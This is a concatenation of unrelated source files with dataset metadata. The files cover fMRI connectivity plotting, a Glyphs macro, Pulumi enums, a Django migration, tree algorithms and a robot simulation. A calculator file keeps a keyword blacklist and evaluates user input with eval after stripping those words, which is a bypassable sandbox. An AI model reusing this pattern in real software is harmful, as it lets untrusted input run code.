# average in matrix form as well as a histogram. We also
# calculate kurtosis and skewness of the histogram.
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import kurtosis
from scipy.stats import skew
from matplotlib import cm as CM
# declare ROI labels
labels = ['rLOF',
'rPORB',
'rFP' ,
'rMOF' ,
'rPTRI',
'rPOPE',
'rRMF' ,
'rSF' ,
'rCMF' ,
'rPREC',
'rPARC',
'rRAC' ,
'rCAC' ,
'rPC' ,
'rISTC',
'rPSTC',
'rSMAR',
'rSP' ,
'rIP' ,
'rPCUN',
'rCUN' ,
'rPCAL',
'rLOCC',
'rLING',
'rFUS' ,
'rPARH',
'rENT' ,
'rTP' ,
'rIT' ,
'rMT' ,
'rBSTS',
'rST' ,
'rTT']
# define the names of the input files where the correlation coefficients were stored
FC_diff_subj1 = 'subject_11/xcorr_diffs_TB_minus_RS.npy'
FC_diff_subj2 = 'subject_12/xcorr_diffs_TB_minus_RS.npy'
FC_diff_subj3 = 'subject_13/xcorr_diffs_TB_minus_RS.npy'
FC_diff_subj4 = 'subject_14/xcorr_diffs_TB_minus_RS.npy'
FC_diff_subj5 = 'subject_15/xcorr_diffs_TB_minus_RS.npy'
FC_diff_subj6 = 'subject_16/xcorr_diffs_TB_minus_RS.npy'
FC_diff_subj7 = 'subject_17/xcorr_diffs_TB_minus_RS.npy'
FC_diff_subj8 = 'subject_18/xcorr_diffs_TB_minus_RS.npy'
FC_diff_subj9 = 'subject_19/xcorr_diffs_TB_minus_RS.npy'
FC_diff_subj10 = 'subject_20/xcorr_diffs_TB_minus_RS.npy'
# define the names of the files where the average functional connectivities
# are stored (for both task-based and resting state)
xcorr_rs_avg_file = 'rs_fc_avg.npy'
xcorr_tb_avg_file = 'tb_fc_avg.npy'
# open files that contain correlation coefficients
fc_diff_subj1 = np.load(FC_diff_subj1)
fc_diff_subj2 = np.load(FC_diff_subj2)
fc_diff_subj3 = np.load(FC_diff_subj3)
fc_diff_subj4 = np.load(FC_diff_subj4)
fc_diff_subj5 = np.load(FC_diff_subj5)
fc_diff_subj6 = np.load(FC_diff_subj6)
fc_diff_subj7 = np.load(FC_diff_subj7)
fc_diff_subj8 = np.load(FC_diff_subj8)
fc_diff_subj9 = np.load(FC_diff_subj9)
fc_diff_subj10 = np.load(FC_diff_subj10)
# open files that contain functional connectivity averages
xcorr_rs_avg = np.load(xcorr_rs_avg_file)
xcorr_tb_avg = np.load(xcorr_tb_avg_file)
# construct numpy array containing functional connectivity arrays
fc_diff = np.array([fc_diff_subj1, fc_diff_subj2, fc_diff_subj3,
fc_diff_subj4, fc_diff_subj5, fc_diff_subj6,
fc_diff_subj7, fc_diff_subj8, fc_diff_subj9,
fc_diff_subj10 ])
# now, we need to apply a Fisher Z transformation to the correlation coefficients,
# prior to averaging.
fc_diff_z = np.arctanh(fc_diff)
# calculate the mean of correlation coefficients across all given subjects
fc_diff_z_mean = np.mean(fc_diff_z, axis=0)
# now, convert back from Z to R correlation coefficients, prior to plotting
fc_diff_mean = np.tanh(fc_diff_z_mean)
#initialize new figure for correlations of Resting State mean
fig = plt.figure('Across-subject average of FC differences (TB-RS)')
ax = fig.add_subplot(111)
# apply mask to get rid of upper triangle, including main diagonal
mask = np.tri(fc_diff_mean.shape[0], k=0)
mask = np.transpose(mask)
fc_diff_mean = np.ma.array(fc_diff_mean, mask=mask) # mask out upper triangle
# plot correlation matrix as a heatmap
cmap = CM.get_cmap('jet', 10)
cmap.set_bad('w')
cax = ax.imshow(fc_diff_mean, vmin=-1, vmax=1.0, interpolation='nearest', cmap=cmap)
ax.grid(False)
plt.colorbar(cax)
# change frequency of ticks to match number of ROI labels
plt.xticks(np.arange(0, len(labels)))
plt.yticks(np.arange(0, len(labels)))
# display labels for brain regions
ax.set_xticklabels(labels, rotation=90)
ax.set_yticklabels(labels)
# Turn off all the ticks
ax = plt.gca()
for t in ax.xaxis.get_major_ticks():
t.tick1On = False
t.tick2On = False
for t in ax.yaxis.get_major_ticks():
t.tick1On = False
t.tick2On = False
# initialize new figure for histogram
fig = plt.figure('Average of FC differences (TB-RS)')
ax = fig.add_subplot(111)
# flatten the numpy cross-correlation matrix
corr_mat = np.ma.ravel(fc_diff_mean)
# remove masked elements from cross-correlation matrix
corr_mat = np.ma.compressed(corr_mat)
# plot a histogram to show the frequency of correlations
plt.hist(corr_mat, 25)
plt.xlabel('Correlation Coefficient')
plt.ylabel('Number of occurrences')
plt.axis([-1, 1, 0, 130])
# initialize new figure scatter plot of xcorr_rs average vs xcorr_tb average
fig = plt.figure()
ax = fig.add_subplot(111)
# apply mask to get rid of upper triangle, including main diagonal
mask = np.tri(xcorr_rs_avg.shape[0], k=0)
mask = np.transpose(mask)
xcorr_rs_avg = np.ma.array(xcorr_rs_avg, mask=mask) # mask out upper triangle
xcorr_tb_avg = np.ma.array(xcorr_tb_avg, mask=mask) # mask out upper triangle
# flatten the numpy cross-correlation arrays
corr_mat_RS = np.ma.ravel(xcorr_rs_avg)
corr_mat_TB = np.ma.ravel(xcorr_tb_avg)
# remove masked elements from cross-correlation arrays
corr_mat_RS = np.ma.compressed(corr_mat_RS)
corr_mat_TB = np.ma.compressed(corr_mat_TB)
# plot a scatter plot to show how averages of xcorr1 and xcorr2 correlate
plt.scatter(corr_mat_RS, corr_mat_TB)
plt.xlabel('Resting-State')
plt.ylabel('Task-Based')
plt.axis([-1,1,-1,1])
# calculate and print kurtosis
print('\nResting-State Fisher kurtosis: ', kurtosis(corr_mat, fisher=True))
print('Resting-State Skewness: ', skew(corr_mat))
# Show the plots on the screen
plt.show()
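# --- Minimal illustration (toy data, not part of the original analysis) ---
# The averaging above maps correlations through arctanh (Fisher Z), averages
# them, and maps back with tanh, because averaging raw r values directly is
# biased. The numbers below are made up purely to show the effect.
toy_r = np.array([0.2, 0.5, 0.8])
print('naive mean of r:       ', np.mean(toy_r))                       # 0.5
print('Fisher-Z averaged mean:', np.tanh(np.mean(np.arctanh(toy_r))))  # ~0.55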
|
[
"xinlong0513@163.com"
] |
xinlong0513@163.com
|
2217ee76daecfe84f81849ca7bcda17568b04510
|
7bc004d6e22ccec582f2fb7f6651a4034feff4f5
|
/Interpolation/Other/New Tab with Masters of Selected Glyphs.py
|
9cc9c627ea19d4987f713d9fc33c2ca3ba19dc8e
|
[
"Apache-2.0"
] |
permissive
|
beppeartz/Glyphs-Scripts
|
d7102291b2bd6bda2680aaeadac4133ddef82327
|
e248fb0701949473dfde358ee83acf3a564c9d55
|
refs/heads/master
| 2022-01-13T22:07:28.532747
| 2021-12-27T22:01:11
| 2021-12-27T22:01:11
| 40,445,584
| 0
| 0
| null | 2015-08-09T18:06:09
| 2015-08-09T18:06:09
| null |
UTF-8
|
Python
| false
| false
| 467
|
py
|
#MenuTitle: New Tab with Masters of Selected Glyphs
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
__doc__="""
Opens a new Edit tab containing all masters of selected glyphs.
"""
import masterNavigation as nav
thisFont = Glyphs.font # frontmost font
if thisFont and thisFont.selectedLayers:
glyphNames = [l.parent.name for l in Font.selectedLayers if l.parent and l.parent.name]
nav.showAllMastersOfGlyphs( glyphNames )
|
[
"res@glyphsapp.com"
] |
res@glyphsapp.com
|
337be842715a37c45179d4aa5d8920ef90f7b136
|
82b946da326148a3c1c1f687f96c0da165bb2c15
|
/sdk/python/pulumi_azure_native/elastic/v20200701preview/_enums.py
|
f335bf9639b12e949bd76fca9ff7ea773793f0e6
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
morrell/pulumi-azure-native
|
3916e978382366607f3df0a669f24cb16293ff5e
|
cd3ba4b9cb08c5e1df7674c1c71695b80e443f08
|
refs/heads/master
| 2023-06-20T19:37:05.414924
| 2021-07-19T20:57:53
| 2021-07-19T20:57:53
| 387,815,163
| 0
| 0
|
Apache-2.0
| 2021-07-20T14:18:29
| 2021-07-20T14:18:28
| null |
UTF-8
|
Python
| false
| false
| 1,075
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'ManagedIdentityTypes',
'MonitoringStatus',
'ProvisioningState',
'TagAction',
]
class ManagedIdentityTypes(str, Enum):
"""
Managed identity type.
"""
SYSTEM_ASSIGNED = "SystemAssigned"
class MonitoringStatus(str, Enum):
"""
Flag specifying if the resource monitoring is enabled or disabled.
"""
ENABLED = "Enabled"
DISABLED = "Disabled"
class ProvisioningState(str, Enum):
"""
Provisioning state of the monitoring tag rules.
"""
ACCEPTED = "Accepted"
CREATING = "Creating"
UPDATING = "Updating"
DELETING = "Deleting"
SUCCEEDED = "Succeeded"
FAILED = "Failed"
CANCELED = "Canceled"
DELETED = "Deleted"
NOT_SPECIFIED = "NotSpecified"
class TagAction(str, Enum):
"""
Valid actions for a filtering tag.
"""
INCLUDE = "Include"
EXCLUDE = "Exclude"
|
[
"noreply@github.com"
] |
morrell.noreply@github.com
|
32c25525e3d4a909105ca7adf465fa65d2316389
|
fb909b0716f62ae118afa7d505cbcbd28f62bc63
|
/venv/lib/python3.6/site-packages/tracking/migrations/0040_auto_20201031_0439.py
|
3f0a6705ae023c6014d6e71b02ccf0bc7cc31a78
|
[] |
no_license
|
dkalola/JustAsk-Final
|
a5b951462cd3c88eb84320bb8fcf10c32f959090
|
c2e7c2ffae4d3c2d870d5ba5348a6bae62db5319
|
refs/heads/main
| 2023-05-24T16:02:17.425251
| 2021-06-16T19:33:52
| 2021-06-16T19:33:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 728
|
py
|
# Generated by Django 3.1.1 on 2020-10-31 04:39
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('tracking', '0039_auto_20201031_0438'),
]
operations = [
migrations.AlterField(
model_name='visitor',
name='last_update',
field=models.DateTimeField(default=datetime.datetime(2020, 10, 31, 4, 39, 1, 444344, tzinfo=utc)),
),
migrations.AlterField(
model_name='visitor',
name='session_start',
field=models.DateTimeField(default=datetime.datetime(2020, 10, 31, 4, 39, 1, 444306, tzinfo=utc)),
),
]
|
[
"divyanshukalola88@gmail.com"
] |
divyanshukalola88@gmail.com
|
d80d5e79d8651a54d21a6514d4614a3945acca00
|
5381c2f94c9c11a0b9678378bbf0ea783f6969f8
|
/calc/pycalc/safe.py
|
dbc124b5af8cac08b789bd2fe4c7cbe9d55af647
|
[] |
no_license
|
Bowserinator/AegisCommand
|
ccdcf2807e63e633bd9bb261699ff18d79bc275f
|
2b226751f6302361cffef42378be4174621e372a
|
refs/heads/master
| 2021-01-02T23:45:47.845299
| 2017-08-06T19:05:30
| 2017-08-06T19:05:30
| 99,507,460
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,831
|
py
|
"""Safety script to delete unsafe variables in the code
Kinda useless but I guess some people would find it better to have it"""
unsafe = [
    "__import__",
    "import",
    "decode",
    "encode",
    "eval",
    "exec",
    "open",
    "sys",
    "os",
    "file",
    "imp",
    "class",
    "assert",
    "def",
    "del",
    "global",
    "raise",
    "with",
    "while",
    "return",
    "yield",
    "from",
    "pass",
    "lambda",
    "nonlocal"
]
from functions import *
from complexdecimal import ComplexDecimal
from date import Date
"""Define list of allowed functions in calc"""
safe_dict = {}
safe_dict["sin"] = sin
safe_dict["cos"] = cos
safe_dict["tan"] = tan
safe_dict["asin"] = asin
safe_dict["acos"] = acos
safe_dict["atan"] = atan
safe_dict["sinh"] = sinh
safe_dict["cosh"] = cosh
safe_dict["tanh"] = tanh
safe_dict["asinh"] = asinh
safe_dict["acosh"] = acosh
safe_dict["atanh"] = atanh
safe_dict["sqrt"] = sqrt
safe_dict["abs"] = abs
safe_dict["log"] = log
safe_dict["fact"] = factorial
safe_dict["factorial"] = factorial
safe_dict["double_fact"] = double_fact
safe_dict["ceil"] = ceil
safe_dict["floor"] = floor
safe_dict["exp"] = exp
safe_dict["ln"] = ln
safe_dict["deg"] = degree
safe_dict["rad"] = radian
safe_dict["degrees"] = degree
safe_dict["radians"] = radian
safe_dict["grad_to_rad"] = grad_to_rad
safe_dict["rad_to_grad"] = rad_to_grad
safe_dict["isPrime"] = isPrime
safe_dict["nCr"] = nCr
safe_dict["nPr"] = nPr
safe_dict["round"] = round
safe_dict["Re"] = Re
safe_dict["Im"] = Im
safe_dict["conj"] = conj
safe_dict["random"] = rand
safe_dict["uniform"] = uniform
safe_dict["gcf"] = gcf
safe_dict["gcd"] = gcf
safe_dict["hcf"] = gcf
safe_dict["lcm"] = lcm
safe_dict["factor"] = factors
safe_dict["ComplexDecimal"] = ComplexDecimal
safe_dict["Date"] = Date
safe_dict["Time"] = Date
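# --- Hedged usage sketch; how the calculator actually consumes safe_dict ---
# --- is an assumption, the real call site lives elsewhere in the project ---
# A common pattern is to strip the blacklisted keywords first and then
# evaluate with builtins disabled, so only the whitelisted names above are
# reachable. The helper name safe_eval is hypothetical.
def safe_eval(expression):
    for word in unsafe:
        expression = expression.replace(word, "")
    return eval(expression, {"__builtins__": None}, safe_dict)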
|
[
"bowserinator@gmail.com"
] |
bowserinator@gmail.com
|
6ff64b329113605c8ac4da135caca84159e6afe4
|
aa5050aeccdd649730c1163e56e98bcd919e460d
|
/Tree/树的子结构/HasSubtree.py
|
dba29b7948a5854b5f3feb5909279e8b7ae2c156
|
[] |
no_license
|
darrenzhang1007/Algorithm
|
482ad837fc7135ba521d73f21989d2326953d506
|
8e121225b7952ef0aa45d2d4970874be944ae93a
|
refs/heads/master
| 2022-12-02T17:44:41.934246
| 2020-08-16T15:43:42
| 2020-08-16T15:43:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,614
|
py
|
# -*- coding:utf-8 -*-
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def HasSubtree(self, pRoot1, pRoot2):
# write code here
if pRoot2 is None or pRoot1 is None:
return False
def hasEqual(pRoot1, pRoot2):
if pRoot1 is None:
return False
if pRoot1.val == pRoot2.val:
if pRoot2.left is None:
leftEqual = True
else:
leftEqual = hasEqual(pRoot1.left, pRoot2.left)
if pRoot2.right is None:
rightEqual = True
else:
rightEqual = hasEqual(pRoot1.right, pRoot2.right)
return leftEqual and rightEqual
return False
if pRoot2.val == pRoot1.val:
ret = hasEqual(pRoot1, pRoot2)
if ret:
return True
ret = self.HasSubtree(pRoot1.left, pRoot2)
if ret:
return True
ret = self.HasSubtree(pRoot1.right, pRoot2)
return ret
if __name__ == '__main__':
t1 = TreeNode(1)
t2 = TreeNode(2)
t3 = TreeNode(3)
t4 = TreeNode(4)
t5 = TreeNode(5)
t6 = TreeNode(6)
t7 = TreeNode(7)
t8 = TreeNode(8)
t9 = TreeNode(3)
t10 = TreeNode(6)
t11 = TreeNode(7)
t1.left = t2
t1.right = t3
t2.left = t4
t2.right = t5
t3.left = t6
t3.right = t7
t6.right = t8
t9.left = t10
t9.right = t11
s = Solution()
print(s.HasSubtree(t1, t9))
|
[
"785320051@qq.com"
] |
785320051@qq.com
|
6687abcc4ee980ffd28c09a14f24077d5e749ae6
|
42b9bafc3c757543328d93fb60269ad4255aae17
|
/cashier/resources.py
|
c2beeae2162a11491ed2aae2133b94bc811190ed
|
[
"MIT"
] |
permissive
|
mejeng/kasir
|
4fe66d1828e72b64d770426d71185cdd3c54127e
|
cc6f9158b61c0cb45078ddf798af9588c8771311
|
refs/heads/master
| 2020-09-25T03:36:10.144439
| 2019-11-30T07:59:23
| 2019-11-30T07:59:23
| 225,908,795
| 2
| 0
|
MIT
| 2019-12-04T16:21:15
| 2019-12-04T16:21:15
| null |
UTF-8
|
Python
| false
| false
| 174
|
py
|
from import_export import resources
from .models import DaftarTransaksi
class TransactionResources(resources.ModelResource):
class Meta:
model = DaftarTransaksi
|
[
"slashsdull@gmail.com"
] |
slashsdull@gmail.com
|
98a517e82787535c19015d8f41d39aa87c68a537
|
6e47be4e22ab76a8ddd7e18c89f5dc4f18539744
|
/venv/openshift/lib/python3.6/site-packages/kubernetes/client/models/v1_server_address_by_client_cidr.py
|
6997dea23e00ca144b27a0e500d5e3e95206dbf1
|
[] |
no_license
|
georgi-mobi/redhat_ocp4.5_training
|
21236bb19d04a469c95a8f135188d3d1ae473764
|
2ccaa90e40dbbf8a18f668a5a7b0d5bfaa1db225
|
refs/heads/main
| 2023-03-30T10:47:08.687074
| 2021-04-01T05:25:49
| 2021-04-01T05:25:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,650
|
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.12.11
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1ServerAddressByClientCIDR(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'client_cidr': 'str',
'server_address': 'str'
}
attribute_map = {
'client_cidr': 'clientCIDR',
'server_address': 'serverAddress'
}
def __init__(self, client_cidr=None, server_address=None):
"""
V1ServerAddressByClientCIDR - a model defined in Swagger
"""
self._client_cidr = None
self._server_address = None
self.discriminator = None
self.client_cidr = client_cidr
self.server_address = server_address
@property
def client_cidr(self):
"""
Gets the client_cidr of this V1ServerAddressByClientCIDR.
The CIDR with which clients can match their IP to figure out the server address that they should use.
:return: The client_cidr of this V1ServerAddressByClientCIDR.
:rtype: str
"""
return self._client_cidr
@client_cidr.setter
def client_cidr(self, client_cidr):
"""
Sets the client_cidr of this V1ServerAddressByClientCIDR.
The CIDR with which clients can match their IP to figure out the server address that they should use.
:param client_cidr: The client_cidr of this V1ServerAddressByClientCIDR.
:type: str
"""
if client_cidr is None:
raise ValueError("Invalid value for `client_cidr`, must not be `None`")
self._client_cidr = client_cidr
@property
def server_address(self):
"""
Gets the server_address of this V1ServerAddressByClientCIDR.
Address of this server, suitable for a client that matches the above CIDR. This can be a hostname, hostname:port, IP or IP:port.
:return: The server_address of this V1ServerAddressByClientCIDR.
:rtype: str
"""
return self._server_address
@server_address.setter
def server_address(self, server_address):
"""
Sets the server_address of this V1ServerAddressByClientCIDR.
Address of this server, suitable for a client that matches the above CIDR. This can be a hostname, hostname:port, IP or IP:port.
:param server_address: The server_address of this V1ServerAddressByClientCIDR.
:type: str
"""
if server_address is None:
raise ValueError("Invalid value for `server_address`, must not be `None`")
self._server_address = server_address
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1ServerAddressByClientCIDR):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
[
"student@workstation.lab.example.com"
] |
student@workstation.lab.example.com
|
83d741e529035424bfb173e6f1d599799aa25c89
|
7c15f211adc9e9eb9f66ccdd570c9f38dff7ea8d
|
/packages/autorest.python/test/vanilla/version-tolerant/Expected/AcceptanceTests/RequiredOptionalVersionTolerant/requiredoptionalversiontolerant/_client.py
|
76b0fc3cb80ffb00dc5a9f3edc0074f398f2c82d
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
Azure/autorest.python
|
cc4bfbf91ae11535731cad37cedd6b733edf1ebd
|
a00d7aaa3753ef05cb5a0d38c664a90869478d44
|
refs/heads/main
| 2023-09-03T06:58:44.246200
| 2023-08-31T20:11:51
| 2023-08-31T20:11:51
| 100,315,955
| 47
| 40
|
MIT
| 2023-09-14T21:00:21
| 2017-08-14T22:58:33
|
Python
|
UTF-8
|
Python
| false
| false
| 4,073
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from copy import deepcopy
from typing import Any, Optional
from azure.core import PipelineClient
from azure.core.rest import HttpRequest, HttpResponse
from ._configuration import AutoRestRequiredOptionalTestServiceConfiguration
from ._serialization import Deserializer, Serializer
from .operations import ExplicitOperations, ImplicitOperations
class AutoRestRequiredOptionalTestService: # pylint: disable=client-accepts-api-version-keyword
"""Test Infrastructure for AutoRest.
:ivar implicit: ImplicitOperations operations
:vartype implicit: requiredoptionalversiontolerant.operations.ImplicitOperations
:ivar explicit: ExplicitOperations operations
:vartype explicit: requiredoptionalversiontolerant.operations.ExplicitOperations
:param required_global_path: number of items to skip. Required.
:type required_global_path: str
:param required_global_query: number of items to skip. Required.
:type required_global_query: str
:param optional_global_query: number of items to skip. Default value is None.
:type optional_global_query: int
:keyword endpoint: Service URL. Default value is "http://localhost:3000".
:paramtype endpoint: str
"""
def __init__( # pylint: disable=missing-client-constructor-parameter-credential
self,
required_global_path: str,
required_global_query: str,
optional_global_query: Optional[int] = None,
*,
endpoint: str = "http://localhost:3000",
**kwargs: Any
) -> None:
self._config = AutoRestRequiredOptionalTestServiceConfiguration(
required_global_path=required_global_path,
required_global_query=required_global_query,
optional_global_query=optional_global_query,
**kwargs
)
self._client: PipelineClient = PipelineClient(base_url=endpoint, config=self._config, **kwargs)
self._serialize = Serializer()
self._deserialize = Deserializer()
self._serialize.client_side_validation = False
self.implicit = ImplicitOperations(self._client, self._config, self._serialize, self._deserialize)
self.explicit = ExplicitOperations(self._client, self._config, self._serialize, self._deserialize)
def send_request(self, request: HttpRequest, **kwargs: Any) -> HttpResponse:
"""Runs the network request through the client's chained policies.
>>> from azure.core.rest import HttpRequest
>>> request = HttpRequest("GET", "https://www.example.org/")
<HttpRequest [GET], url: 'https://www.example.org/'>
>>> response = client.send_request(request)
<HttpResponse: 200 OK>
For more information on this code flow, see https://aka.ms/azsdk/dpcodegen/python/send_request
:param request: The network request you want to make. Required.
:type request: ~azure.core.rest.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to False.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.rest.HttpResponse
"""
request_copy = deepcopy(request)
request_copy.url = self._client.format_url(request_copy.url)
return self._client.send_request(request_copy, **kwargs)
def close(self) -> None:
self._client.close()
def __enter__(self) -> "AutoRestRequiredOptionalTestService":
self._client.__enter__()
return self
def __exit__(self, *exc_details: Any) -> None:
self._client.__exit__(*exc_details)
|
[
"noreply@github.com"
] |
Azure.noreply@github.com
|
d2741b142ac72bf65915d1fca8e80a9bcbbb454d
|
f3caf3519b410f1ee98d1e55f781bb60132f211a
|
/sesion_4/robotai.py
|
28a2c2718d3e521c57f770af2bd7a7001c1ff91c
|
[] |
no_license
|
diegotriana11/python-master
|
3895f3cc41cf7f0fe474b522162670ec6aaeccba
|
e7b654870896d2c94e2be24d5683574aaf6cb44b
|
refs/heads/master
| 2020-09-07T16:58:02.727670
| 2016-09-25T19:41:58
| 2016-09-25T19:41:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 826
|
py
|
from robot import Robot
import matplotlib.pyplot as plot
import math
class RobotAI(Robot):
def seguir(self, xo, yo):
ux = math.cos(self.t)
uy = math.sin(self.t)
vx = xo - self.x
vy = yo - self.y
d = ux * vx + uy * vy
r = (vx**2 + vy**2)**0.5
if d >= r:
self.girar(-0.8)
elif d < r:
self.girar(0.8)
if abs(math.acos(d / r)) <= 0.8:
self.mover(0.1)
else:
self.mover(0.01)
if __name__ == "__main__":
xo = -5
yo = 4
r = RobotAI(0, 0, 0)
# plot.ion()
while True:
# plot.clf()
plot.axis([-10, 10, -10, 10])
plot.autoscale(False)
r.seguir(xo, yo)
plot.scatter(xo, yo)
r.dibujar()
plot.pause(0.00001)
#r.log()
|
[
"kmmx@hsoft.local"
] |
kmmx@hsoft.local
|
ec9661055806bf608d680c31602cddf4f16afaff
|
b42850bc3e36bbd1683070393582617f2b3cd8e6
|
/Exam_16_08_20/project/software/express_software.py
|
db3c3bd039c77f3f14e0dd0f082a137f77802d9b
|
[] |
no_license
|
marianidchenko/Python_OOP
|
aecca18be6df3850c0efbf2fa6d25bf3ff53ae96
|
547c12cbdad5b8c16fa55bba6c03b71db181ad2b
|
refs/heads/main
| 2023-07-09T05:42:43.863681
| 2021-08-14T14:55:51
| 2021-08-14T14:55:51
| 381,572,168
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 361
|
py
|
from project.software.software import Software
class ExpressSoftware(Software):
TYPE = "Express"
memory_factor = 2
def __init__(self, name, capacity_consumption, memory_consumption):
new_memory = int(memory_consumption * ExpressSoftware.memory_factor)
super().__init__(name, ExpressSoftware.TYPE, capacity_consumption, new_memory)
|
[
"marianidchenko@gmail.com"
] |
marianidchenko@gmail.com
|
d1452747a62b51f3b744fe1e987a746fb2a010b1
|
342a1ec794df5424bfc4f6af2cb8de415068201b
|
/oscar_promotions/conf.py
|
04a41e4cddd3b7b455d944474aaf7f48062c75e4
|
[] |
no_license
|
penta-srl/django-oscar-promotions
|
c5d0b159950189f23852665ce7e3b3a2fe248bd5
|
65bdf39b48409311e7284fc0a12e8b2e17f176dd
|
refs/heads/master
| 2020-07-06T23:48:45.660316
| 2019-07-08T19:23:15
| 2019-07-08T19:23:15
| 203,176,440
| 0
| 0
| null | 2019-08-19T13:16:55
| 2019-08-19T13:16:55
| null |
UTF-8
|
Python
| false
| false
| 717
|
py
|
from oscar.core.loading import get_class
SingleProduct = get_class('oscar_promotions.models', 'SingleProduct')
RawHTML = get_class('oscar_promotions.models', 'RawHTML')
Image = get_class('oscar_promotions.models', 'Image')
PagePromotion = get_class('oscar_promotions.models', 'PagePromotion')
AutomaticProductList = get_class('oscar_promotions.models', 'AutomaticProductList')
HandPickedProductList = get_class('oscar_promotions.models', 'HandPickedProductList')
MultiImage = get_class('oscar_promotions.models', 'MultiImage')
def get_promotion_classes():
return (RawHTML, Image, SingleProduct, AutomaticProductList,
HandPickedProductList, MultiImage)
PROMOTION_CLASSES = get_promotion_classes()
|
[
"sasha@sasha0.ru"
] |
sasha@sasha0.ru
|
d906fab608afb5da22ad7279b6627e64d47fe827
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02686/s748344982.py
|
09fa7e43a826d467f581733c8790139b8003bb68
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 862
|
py
|
# input
N = int(input())
S = [input() for _ in range(N)]
# process
T = []
for s in S:
while '()' in s:
s = s.replace('()', '')
T.append(s)
l1 = []
l2 = []
for t in T:
op = t.find('(')
if op < 0:
op = len(t)
cl = len(t) - op
if cl+op != 0:
if cl <= op:
l1.append((cl, op))
else:
l2.append((op, cl))
l1.sort()
l2.sort(reverse=True)
result = False
x = 0
if len(l1)+len(l2) == 0:
result = True
elif len(l1)>0 and len(l2)>0 and l1[0][0]+l2[-1][0] == 0:
for cl, op in l1:
x -= cl
if x < 0:
break
x += op
if x >= 0:
for op, cl in l2:
x -= cl
if x < 0:
break
x += op
if x == 0:
result = True
# output
print("Yes" if result else "No")
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
988a51826c16601bdc825af89f23a17af69d3daa
|
9d9eb39e6adc35926d9ca5c38d5bbd05ccc6d15b
|
/python/binary_tree/create_balanced_btree.py
|
5e53687e1bcacc998a3609384e40dcbd86054e01
|
[
"Unlicense"
] |
permissive
|
amitsaha/learning
|
8121d60639f64a2a517ffb855d73de083ebfb445
|
4c1d85adf8018465716a1e8a74afadfe5f5528a2
|
refs/heads/master
| 2023-03-07T13:55:12.871756
| 2022-11-08T06:45:23
| 2022-11-08T06:45:23
| 25,386,786
| 6
| 4
|
Unlicense
| 2023-02-25T00:55:16
| 2014-10-18T04:03:55
|
Python
|
UTF-8
|
Python
| false
| false
| 709
|
py
|
'''
Create a balanced binary search tree from a given sorted array
'''
class Node:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
def preorder(root):
    print(root.value)
if root.left:
preorder(root.left)
if root.right:
preorder(root.right)
def create_tree(arr, start, end):
if start > end:
return
mid = int((start + end)/2.0)
root_val = arr[mid]
root = Node(root_val)
root.left = create_tree(arr, start, mid-1)
root.right = create_tree(arr, mid+1, end)
return root
root = create_tree([1, 2, 3], 0, 2)
preorder(root)
root = create_tree([1, 2, 3, 4], 0, 3)
preorder(root)
|
[
"amitsaha.in@gmail.com"
] |
amitsaha.in@gmail.com
|
289e1088e4ac6e54a7bd6c0dc0eb8024313a147a
|
333fac4c6a47b2448eca1017a794c386672a4aba
|
/neighbourapp/migrations/0003_auto_20201103_2036.py
|
b285ede772a02a3b392c5fce9cc0ac7e9b5d8708
|
[
"MIT"
] |
permissive
|
mornicamwende/neighbourhood
|
